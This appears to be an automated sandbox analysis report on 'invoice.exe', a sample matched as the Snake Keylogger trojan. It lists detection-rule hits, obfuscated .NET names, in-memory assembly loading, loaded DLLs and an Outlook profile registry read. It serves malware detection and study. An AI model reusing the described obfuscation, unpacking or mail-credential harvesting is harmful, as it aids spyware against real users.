Source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: invoice.exe PID: 7644, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.invoice.exe.4e83658.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.invoice.exe.4e83658.1.raw.unpack, COVID19.cs	Base64 encoded string: 'HwYJx7FHIOV6XNDKgd1n4JGyiz8rex38v6OG2WFspvljHvh0nRM/cw==', 'HwYJx7FHIOV6XNDKgd1n4JGyiz8rex38v6OG2WFspvljHvh0nRM/cw=='
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, COVID19.cs	Base64 encoded string: 'HwYJx7FHIOV6XNDKgd1n4JGyiz8rex38v6OG2WFspvljHvh0nRM/cw==', 'HwYJx7FHIOV6XNDKgd1n4JGyiz8rex38v6OG2WFspvljHvh0nRM/cw=='

Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, xooFBNJNioHs7l2I7V.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, xooFBNJNioHs7l2I7V.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	Security API names: _0020.SetAccessControl
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	Security API names: _0020.AddAccessRule
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	Security API names: _0020.SetAccessControl
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@6/4

Source: C:\Users\user\Desktop\invoice.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\invoice.exe	Mutant created: \Sessions\1\BaseNamedObjects\XhOleIVVfFHKGtlviljlsvI

Source: invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: invoice.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: invoice.exe	ReversingLabs: Detection: 52%
Source: invoice.exe	Virustotal: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"
Source: C:\Users\user\Desktop\invoice.exe	Process created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"
Source: C:\Users\user\Desktop\invoice.exe	Process created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.invoice.exe.7ec0000.8.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice.exe.42d1ea0.4.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	.Net Code: jntaWmgk3A System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	.Net Code: jntaWmgk3A System.Reflection.Assembly.Load(byte[])
Source: 0.2.invoice.exe.42b9c80.2.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057D6726 push dword ptr [esp+edx-75h]; iretd	0_2_057D672A
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057D8663 push eax; mov dword ptr [esp], edx	0_2_057D866C
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DD6C3 push ds; iretd	0_2_057DD6C9
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057D3EA0 push esp; retf	0_2_057D3EA1
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_0DCB35CD push FFFFFF8Bh; iretd	0_2_0DCB35CF
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_0DCB0CF3 push ecx; iretd	0_2_0DCB0D1C
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F99C30 push esp; retf 0567h	2_2_02F99D55

Source: invoice.exe

Static PE information: section name: .text entropy: 7.870657597769688

Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, OWrAqTU8cKq0ljpQE6w.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AEkl7HhOtt', 'xIelPkxNCN', 'NsolomKrta', 'ePrlk74ska', 'semlCYOuvp', 'N9OlnrVoRb', 'AIOlYW8kfM'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	High entropy of concatenated method names: 'FgW8vDuJof', 'jdg8HJrgMW', 'J1R8TDcP1W', 'y2N8IeyU8B', 'nVK8DPgpom', 'xWQ8E0T7Ln', 'Txv8jeh9uq', 'IT88umqaLw', 'VVr80JiYJZ', 'POE8pJe1nb'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, tpYOOYNRDTYNmZQy3D.cs	High entropy of concatenated method names: 'SUSD46GNLb', 'zFLDF1DVkf', 'RCUIcY3KLY', 'Wb2IMuknr6', 'nLyItXXdv3', 'XtGI9QckMs', 'UQAIKaFikU', 'CHgI13N8Jq', 'M9JILBBlQ1', 'M8KIS2NB9A'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, z37a55I7tnxP8UJgRY.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'W4JBfTNKcj', 'PgHByvPvgL', 'IelBzdNEFT', 'wT98Ry2cZ2', 'oOE8UlfCLR', 'mag8BhGaVK', 'FsE88viEnw', 'hIbauhOrNtJQkxqQItS'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, xooFBNJNioHs7l2I7V.cs	High entropy of concatenated method names: 'JGET7xs11b', 'TFiTP2vFag', 'QNaTo6H1Da', 'igDTkTJHHu', 'OA8TCchnsE', 'HrDTnUs7oI', 'PCtTYa94UC', 'PdPTiDIppS', 'rGyTfsZpFW', 'PdoTyFoesX'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, q50EuwB1ZswLOLyd3Y.cs	High entropy of concatenated method names: 'LntWE1PLa', 'WX3xCC6B3', 'Y83mVa7RI', 'hGhFtcnnv', 'M0nh0ssGZ', 'CcaNBFwwy', 'DU6Ulk3kOpUjfrr4kn', 'DoETtlFuWjvvQXdwmp', 'QNCexpDwA', 'kHSlPbcr8'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, UCumTKzeXP2qsxMTCl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TEvwdw5KIs', 'DvRwrbVs9y', 'RQpwZq0laf', 'PeGwq2MBVQ', 'adXwef905Y', 'edawwTMwd9', 'JBewlUlVGV'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, yD67UMi68PjKIgMv2e.cs	High entropy of concatenated method names: 'vZpeHnvJSw', 'OAbeTKCh3V', 'KRPeILGu8Q', 'mh6eDQvdt0', 'f3heEHC6D2', 'EhNejQhdFR', 'cvPeu1tOJX', 'de9e0su3mg', 'xKrepVb5Eh', 'Vjye5M1KUj'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, YoIqUynN03x5GW76LY.cs	High entropy of concatenated method names: 'LpmqiMcLvx', 'bTyqyaB0rh', 'IqkeR00tMp', 'Y4XeU45vME', 'PbGqXe26cM', 'e3LqGVs502', 'CqOq37EjW3', 'fBLq7ChPTg', 'tvhqP0hf8p', 'H6YqoXJOj0'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, XJXZeAURR8bNbkVL9Qa.cs	High entropy of concatenated method names: 'YMPwVCHDMB', 'PaiwOW4tDT', 'PEFwWxqjNG', 'KKgwx5ZMxK', 'Qoww4WulSS', 'DhDwm83AvU', 'HjuwFwiilH', 'T2FwJyh2QP', 'Aw1whtEJoP', 'm4LwNXwwJ4'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, DLDyoth3cA9OPF4BBW.cs	High entropy of concatenated method names: 'LQXIxswrwg', 'mJsImlkAnF', 'O67IJ5GyRA', 'tEXIhvQ0jZ', 'OT8IrBOayM', 'zAeIZ01AAI', 'aX5Iqwo3L8', 'pJkIeiaSgh', 'jg2IwvTGpm', 'cnuIltFfyD'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, Q8Savn2EEKDvGGk4tD.cs	High entropy of concatenated method names: 'e0UEvaUSPP', 'OVdEThHjWd', 'GipEDoHGKb', 'BdlEjh1FjP', 'bvmEuwQpAf', 'xC4DC3JeSj', 'p8DDnwJ9Xt', 'jfPDY72uEe', 'b49Div8DLI', 'ukKDfOoQM4'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, qxMMnGkCuky0jlW00b.cs	High entropy of concatenated method names: 'pVKqpMcprJ', 'mIFq5BxTZN', 'ToString', 'v4kqHel3qY', 'Re2qT96IcX', 'O42qI44w3P', 'vCFqD2lKef', 'L7cqEUXLkk', 'mPmqjF6Qv3', 'EoJquijxcx'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, DlUn9GLvZFJucIvH6U.cs	High entropy of concatenated method names: 'iHYjVVeMXu', 'DnLjOcf2kk', 'rHpjWs8smY', 'M84jxudiRR', 'DtSj4LooI0', 'qfIjm51v21', 'S2jjFZqI7j', 'OyijJMYFHh', 'rhVjhSLmiQ', 'YXijNWwMEF'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, rSm8epM8LZPO3wujOF.cs	High entropy of concatenated method names: 'UpRE6ARatT', 'dvkEVWiQC4', 'YQtEWD8IOP', 'N37ExX55tF', 'yoMEmHl9AA', 'jxZEFEq2qP', 'SfmEhfxqYy', 'LBPENrvxad', 'UDvLsM0DFhROnAvIIJf', 'qWYgri0kjOY6B13ISVt'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, DRVodCTgBbwhV3HwKW.cs	High entropy of concatenated method names: 'Dispose', 'xCWUfkllNU', 'du0Bb79u1h', 'rHlvvFCObC', 'fODUy67UM6', 'cPjUzKIgMv', 'ProcessDialogKey', 'Ge2BRrgFwg', 'sEDBUvN79E', 'tBdBBSFgYO'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, GrgFwgflEDvN79EABd.cs	High entropy of concatenated method names: 'CGpe2L0QDc', 'ITieb5wXmT', 'tVcecMVIlu', 'nWSeMyKkdY', 'EDse7MrHea', 'j5retp6tMf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, jbxWpuaAKyXyeIInMy.cs	High entropy of concatenated method names: 'tb6UjooFBN', 'FioUuHs7l2', 'J3cUpA9OPF', 'ABBU5WApYO', 'pQyUr3D38S', 'dvnUZEEKDv', 'crhETH5Fmw6mmxUepw', 'lOhtT0MX3KLxIEQ9RE', 'en3UUn08v8', 'LI1U8iDEIL'
Source: 0.2.invoice.exe.4d15c30.3.raw.unpack, qcRFcU3V7gP2X0g1AO.cs	High entropy of concatenated method names: 'bgqdJOvb1S', 'nvSdhaICw2', 'yy2d2cscCA', 'tn9dbpBV1W', 'K3JdMNpJrv', 'ee5dtsb6dW', 'uAEdK4qHHK', 'Db1d1j6nil', 'RnudSGQRjk', 'GiTdXh0tEe'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, OWrAqTU8cKq0ljpQE6w.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AEkl7HhOtt', 'xIelPkxNCN', 'NsolomKrta', 'ePrlk74ska', 'semlCYOuvp', 'N9OlnrVoRb', 'AIOlYW8kfM'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, WOqrwBu3NKsXnk9m8R.cs	High entropy of concatenated method names: 'FgW8vDuJof', 'jdg8HJrgMW', 'J1R8TDcP1W', 'y2N8IeyU8B', 'nVK8DPgpom', 'xWQ8E0T7Ln', 'Txv8jeh9uq', 'IT88umqaLw', 'VVr80JiYJZ', 'POE8pJe1nb'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, tpYOOYNRDTYNmZQy3D.cs	High entropy of concatenated method names: 'SUSD46GNLb', 'zFLDF1DVkf', 'RCUIcY3KLY', 'Wb2IMuknr6', 'nLyItXXdv3', 'XtGI9QckMs', 'UQAIKaFikU', 'CHgI13N8Jq', 'M9JILBBlQ1', 'M8KIS2NB9A'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, z37a55I7tnxP8UJgRY.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'W4JBfTNKcj', 'PgHByvPvgL', 'IelBzdNEFT', 'wT98Ry2cZ2', 'oOE8UlfCLR', 'mag8BhGaVK', 'FsE88viEnw', 'hIbauhOrNtJQkxqQItS'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, xooFBNJNioHs7l2I7V.cs	High entropy of concatenated method names: 'JGET7xs11b', 'TFiTP2vFag', 'QNaTo6H1Da', 'igDTkTJHHu', 'OA8TCchnsE', 'HrDTnUs7oI', 'PCtTYa94UC', 'PdPTiDIppS', 'rGyTfsZpFW', 'PdoTyFoesX'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, q50EuwB1ZswLOLyd3Y.cs	High entropy of concatenated method names: 'LntWE1PLa', 'WX3xCC6B3', 'Y83mVa7RI', 'hGhFtcnnv', 'M0nh0ssGZ', 'CcaNBFwwy', 'DU6Ulk3kOpUjfrr4kn', 'DoETtlFuWjvvQXdwmp', 'QNCexpDwA', 'kHSlPbcr8'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, UCumTKzeXP2qsxMTCl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TEvwdw5KIs', 'DvRwrbVs9y', 'RQpwZq0laf', 'PeGwq2MBVQ', 'adXwef905Y', 'edawwTMwd9', 'JBewlUlVGV'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, yD67UMi68PjKIgMv2e.cs	High entropy of concatenated method names: 'vZpeHnvJSw', 'OAbeTKCh3V', 'KRPeILGu8Q', 'mh6eDQvdt0', 'f3heEHC6D2', 'EhNejQhdFR', 'cvPeu1tOJX', 'de9e0su3mg', 'xKrepVb5Eh', 'Vjye5M1KUj'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, YoIqUynN03x5GW76LY.cs	High entropy of concatenated method names: 'LpmqiMcLvx', 'bTyqyaB0rh', 'IqkeR00tMp', 'Y4XeU45vME', 'PbGqXe26cM', 'e3LqGVs502', 'CqOq37EjW3', 'fBLq7ChPTg', 'tvhqP0hf8p', 'H6YqoXJOj0'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, XJXZeAURR8bNbkVL9Qa.cs	High entropy of concatenated method names: 'YMPwVCHDMB', 'PaiwOW4tDT', 'PEFwWxqjNG', 'KKgwx5ZMxK', 'Qoww4WulSS', 'DhDwm83AvU', 'HjuwFwiilH', 'T2FwJyh2QP', 'Aw1whtEJoP', 'm4LwNXwwJ4'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, DLDyoth3cA9OPF4BBW.cs	High entropy of concatenated method names: 'LQXIxswrwg', 'mJsImlkAnF', 'O67IJ5GyRA', 'tEXIhvQ0jZ', 'OT8IrBOayM', 'zAeIZ01AAI', 'aX5Iqwo3L8', 'pJkIeiaSgh', 'jg2IwvTGpm', 'cnuIltFfyD'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, Q8Savn2EEKDvGGk4tD.cs	High entropy of concatenated method names: 'e0UEvaUSPP', 'OVdEThHjWd', 'GipEDoHGKb', 'BdlEjh1FjP', 'bvmEuwQpAf', 'xC4DC3JeSj', 'p8DDnwJ9Xt', 'jfPDY72uEe', 'b49Div8DLI', 'ukKDfOoQM4'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, qxMMnGkCuky0jlW00b.cs	High entropy of concatenated method names: 'pVKqpMcprJ', 'mIFq5BxTZN', 'ToString', 'v4kqHel3qY', 'Re2qT96IcX', 'O42qI44w3P', 'vCFqD2lKef', 'L7cqEUXLkk', 'mPmqjF6Qv3', 'EoJquijxcx'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, DlUn9GLvZFJucIvH6U.cs	High entropy of concatenated method names: 'iHYjVVeMXu', 'DnLjOcf2kk', 'rHpjWs8smY', 'M84jxudiRR', 'DtSj4LooI0', 'qfIjm51v21', 'S2jjFZqI7j', 'OyijJMYFHh', 'rhVjhSLmiQ', 'YXijNWwMEF'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, rSm8epM8LZPO3wujOF.cs	High entropy of concatenated method names: 'UpRE6ARatT', 'dvkEVWiQC4', 'YQtEWD8IOP', 'N37ExX55tF', 'yoMEmHl9AA', 'jxZEFEq2qP', 'SfmEhfxqYy', 'LBPENrvxad', 'UDvLsM0DFhROnAvIIJf', 'qWYgri0kjOY6B13ISVt'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, DRVodCTgBbwhV3HwKW.cs	High entropy of concatenated method names: 'Dispose', 'xCWUfkllNU', 'du0Bb79u1h', 'rHlvvFCObC', 'fODUy67UM6', 'cPjUzKIgMv', 'ProcessDialogKey', 'Ge2BRrgFwg', 'sEDBUvN79E', 'tBdBBSFgYO'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, GrgFwgflEDvN79EABd.cs	High entropy of concatenated method names: 'CGpe2L0QDc', 'ITieb5wXmT', 'tVcecMVIlu', 'nWSeMyKkdY', 'EDse7MrHea', 'j5retp6tMf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, jbxWpuaAKyXyeIInMy.cs	High entropy of concatenated method names: 'tb6UjooFBN', 'FioUuHs7l2', 'J3cUpA9OPF', 'ABBU5WApYO', 'pQyUr3D38S', 'dvnUZEEKDv', 'crhETH5Fmw6mmxUepw', 'lOhtT0MX3KLxIEQ9RE', 'en3UUn08v8', 'LI1U8iDEIL'
Source: 0.2.invoice.exe.7b90000.6.raw.unpack, qcRFcU3V7gP2X0g1AO.cs	High entropy of concatenated method names: 'bgqdJOvb1S', 'nvSdhaICw2', 'yy2d2cscCA', 'tn9dbpBV1W', 'K3JdMNpJrv', 'ee5dtsb6dW', 'uAEdK4qHHK', 'Db1d1j6nil', 'RnudSGQRjk', 'GiTdXh0tEe'

Source: C:\Users\user\Desktop\invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
